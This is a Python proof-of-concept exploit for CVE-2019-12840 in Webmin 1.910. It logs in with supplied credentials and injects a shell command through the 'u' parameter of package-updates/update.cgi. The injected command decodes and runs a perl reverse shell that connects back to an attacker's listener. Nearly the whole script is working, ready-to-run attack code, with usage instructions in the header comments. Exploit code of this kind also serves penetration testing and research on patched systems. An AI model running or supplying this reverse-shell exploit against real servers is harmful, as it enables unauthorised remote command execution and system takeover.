#!/usr/bin/python3
# Exploit Title: Webmin 1.910 - 'Package Updates' Remote Command Execution - Python exploit (authenticated: requires valid Webmin credentials)
# Date: 17 December 2019
# Exploit Author: @NaveenNguyen, @Stormworm29
# Software Link: https://sourceforge.net/projects/webadmin/files/webmin/1.910/
# Version: Webmin 1.910
# Tested on: Ubuntu 18.04.3 LTS
# CVE : 2019-12840
# The reverse shell is the msfvenom cmd/unix/reverse_perl payload (msfvenom -p cmd/unix/reverse_perl lhost=<attacker_ip> lport=<attacker_port>),
# built inline by payload() below, so no msfvenom run is needed. Start a listener on <attacker_ip>:<attacker_port> first, then:
#   python3 exploit_poc.py --ip_address=<victim_ip> --port=<victim_port> --lhost=<attacker_ip> --lport=<attacker_port> --user=<username> --password=<password>
import argparse
import base64
import getpass
import sys
import urllib.parse

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
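def banner():
    """Print the tool title in green (ANSI SGR 32), then reset the colour.

    The version in the title is 1.910, matching the header and the CVE; the
    original banner misprinted it as "1.9101".
    """
    print("\033[32m")
    print("Webmin 1.910 - 'Package updates' RCE")
    print("\033[0m")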
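def payload(lhost_add, lport_add):
    """Build the form body for package-updates/update.cgi that spawns a reverse shell.

    The body carries two ``u`` (package) values: ``acl/apt`` and a second one
    that decodes to `` | bash -c "..."``.  That second value is the injection:
    update.cgi in 1.910 hands it to the shell unsanitised (CVE-2019-12840, see
    header).  The bash command base64-decodes a perl reverse shell that connects
    back to ``lhost_add:lport_add`` and runs every line it receives via
    ``system``.

    Args:
        lhost_add: listener address the shell connects back to.
        lport_add: listener port.

    Returns:
        The URL-encoded ``application/x-www-form-urlencoded`` body as a str.

    Raises:
        ValueError: if either listener parameter is ``None``, so a payload
            that would connect back to ``None:None`` is never fired.
    """
    if lhost_add is None or lport_add is None:
        raise ValueError("lhost and lport are required to build the reverse shell")
    print("[+] Generating Payload...")
    connect_back = f"{lhost_add}:{lport_add}"
    # cmd/unix/reverse_perl: fork (parent exits so update.cgi returns), untaint
    # %ENV, connect back, then feed each line read from the socket to system().
    perl_payload = (
        "perl -MIO -e '$p=fork;exit,if($p);"
        "foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}"
        "$c=new IO::Socket::INET(PeerAddr,\"" + connect_back + "\");"
        "STDIN->fdopen($c,r);$~->fdopen($c,w);"
        "while(<>){if($_=~ /(.*)/){system $1;}};'"
    )
    b64_shell = base64.b64encode(perl_payload.encode("utf-8")).decode("utf-8")
    # Brace expansion ({echo,X} -> "echo X") keeps the quoted command free of
    # whitespace, which is what the original PoC relies on.
    bash_payload = f'bash -c "{{echo,{b64_shell}}}|{{base64,-d}}|{{bash,-i}}"'
    # quote() (not quote_plus): spaces become %20; '/' from the base64 alphabet
    # stays literal, which is valid inside a form body.
    url_encoded_payload = urllib.parse.quote(bash_payload)
    # First u= is a real package name; the second decodes to " | <cmd>".
    final_payload = (
        "u=acl%2Fapt&u=%20%7C%20"
        + url_encoded_payload
        + "&ok_top=Update+Selected+Packages"
    )
    print("[+] Reverse Payload Generated : " + final_payload)
    return final_payload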
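def exploit(url, payload, username, password, *, timeout=30):
    """Log in to Webmin and POST the injection body to package-updates/update.cgi.

    Args:
        url: base URL of the target, e.g. ``https://10.0.0.5:10000``.
        payload: form body as returned by the module-level ``payload()``
            (this parameter shadows that function inside this scope).
        username: Webmin account used for session_login.cgi.
        password: its password, sent in the clear in the form body.
        timeout: seconds allowed for the login request (connect + read) and
            for connecting to update.cgi.  The read on update.cgi is left
            unbounded on purpose: it may block while the injected pipeline runs.

    Raises:
        RuntimeError: when the login POST leaves no session cookie behind, so
            the injection is never fired with an unauthenticated session (the
            original PoC printed "Login Successful" unconditionally).
        requests.exceptions.RequestException: on network errors or timeouts.

    TLS certificate verification is disabled deliberately: Webmin is usually
    deployed with a self-signed certificate.  Acceptable for a PoC against a
    lab target only; do not copy this into anything else.
    """
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    login_form = {'user': username, 'pass': password}
    url_login = url + '/session_login.cgi'
    url_updates = url + '/package-updates/update.cgi'
    # NOTE(review): these cookies mirror what the original PoC sends with the
    # login POST; 'sid' is only a dummy value.  Keep them as-is.
    cookies = {'redirect': '1', 'testing': '1', 'sid': 'x'}
    # Referer pointed at the target itself; presumably satisfies Webmin's
    # referer check on module requests -- keep.
    headers = {'referer': url}
    s = requests.Session()
    print("[+] Attempting to login to Webmin")
    login_resp = s.post(url_login, data=login_form, allow_redirects=False,
                        verify=False, cookies=cookies, timeout=timeout)
    # Only Set-Cookie headers from the server land in the session jar (the
    # dummy 'sid' we sent does not), so a missing 'sid' means no session was
    # issued.  Confirm against the target version if this check misfires.
    if 'sid' not in s.cookies:
        raise RuntimeError(
            f"[-] Login failed (HTTP {login_resp.status_code}); check credentials and URL"
        )
    print("[+] Login Successful")
    print("[+] Attempting to Exploit")
    resp = s.post(url_updates, data=payload, headers=headers, verify=False,
                  timeout=(timeout, None))
    if resp.ok:
        print('[+] Exploited Successfully')
    else:
        print(f'[-] update.cgi answered HTTP {resp.status_code}; check the listener anyway')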
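def main():
    """Parse the command line, build the reverse-shell body and fire it.

    All target/listener arguments are mandatory; previously a missing one
    silently produced a URL or payload containing the string "None".
    ``--password`` may be omitted, in which case the password is read from
    the terminal so it does not end up in shell history or ``ps`` output.
    """
    parser = argparse.ArgumentParser(
        description="Webmin 1.910 'Package Updates' RCE (CVE-2019-12840) - authenticated",
    )
    parser.add_argument('--ip_address', required=True, help='Enter IP address of the Webmin')
    parser.add_argument('--port', type=int, default=10000, help='Enter port value of the Webmin')
    parser.add_argument('--lhost', required=True, help='Enter listener IP address (Attackers IP)')
    parser.add_argument('--lport', required=True, help='Enter listener port (Attackers port)')
    parser.add_argument('--user', required=True, help='Enter Username for Webmin')
    parser.add_argument('--password', help='Enter Password for Webmin (prompted if omitted)')
    args = parser.parse_args()
    banner()
    # Prompting keeps the secret off the command line when the caller prefers.
    password = args.password
    if password is None:
        password = getpass.getpass("Webmin password: ")
    final_payload = payload(args.lhost, args.lport)
    url_webmin = f'https://{args.ip_address}:{args.port}'
    exploit(url_webmin, final_payload, args.user, password)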
# Import guard: importing this module (e.g. to reuse payload()) must not run the exploit.
if __name__ == "__main__":
    main()